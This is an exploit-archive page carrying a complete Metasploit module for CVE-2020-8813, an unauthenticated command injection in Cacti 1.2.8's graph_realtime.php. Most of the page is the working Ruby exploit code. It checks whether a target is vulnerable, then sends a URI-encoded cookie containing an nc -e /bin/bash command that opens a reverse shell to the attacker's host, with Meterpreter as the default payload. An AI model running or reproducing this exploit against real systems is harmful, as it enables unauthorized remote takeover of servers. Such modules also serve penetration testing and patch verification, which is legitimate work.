Cacti 1.2.8 Unauthenticated Remote Code Execution

Cacti 1.2.8 Unauthenticated Remote Code Execution: Posted Mar 2, 2020; Authored by Lucas Amorim | Site metasploit.com; graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie if a guest user has the graph real-time privilege.; tags | exploit, remote, arbitrary, shell, php; advisories | CVE-2020-8813; SHA-256 | ddfd448fc925b28a03aaba73be8f9999625bb6879802ec1b4e35f2eeef4e1d87; Download | Favorite | View

Cacti 1.2.8 Unauthenticated Remote Code Execution

# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
# Date: 2020-02-29
# Exploit Author: Lucas Amorim (sh286)s
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: Linux
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cacti v1.2.8 Unauthenticated Remote Code Execution',
      'Description' => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to 
        execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has 
        the graph real-time privilege.},
      'Author' =>
        [
          'Lucas Amorim ' # MSF module
        ],
      'License' => MSF_LICENSE,
      'Platform' => 'php',
      'References' =>
        [
          ['CVE', '2020-8813']
        ],
      'DisclosureDate' => 'Feb 21 2020',
      'Privileged' => true,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
        'SSL' => true,
      },
      'Targets' => [
        ['Automatic', {}]
      ],
      'DefaultTarget'   => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('RPATH', [ false, "path to cacti", "" ])
        ])

        deregister_options('VHOST')
  end

  def check
    res = send_request_raw(
      'method' => 'GET',
      'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init"
    )

    if res && res.code == 200
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def send_payload()
    exec_payload=(";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % [datastore['LHOST'], datastore['LPORT']])
    send_request_raw(
      'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init",
      'method' => 'GET',
      'cookie' => "Cacti=#{Rex::Text.uri_encode(exec_payload, mode = 'hex-normal')}"
    )
  end

  def exploit
    if check == Exploit::CheckCode::Vulnerable
      print_good("Target seems to be a vulnerable")
      send_payload()
    else
      print_error("Target does not seem to be vulnerable. Will exit now...")
    end
  end
end

Top Authors In Last 30 Days

Red Hat 286 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 6 files
Milad Karimi 4 files
Google Security Research 3 files
Adam Gowdiak 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

Cacti 1.2.8 Unauthenticated Remote Code Execution

Cacti 1.2.8 Unauthenticated Remote Code Execution

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cacti 1.2.8 Unauthenticated Remote Code Execution

Share This

Cacti 1.2.8 Unauthenticated Remote Code Execution

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems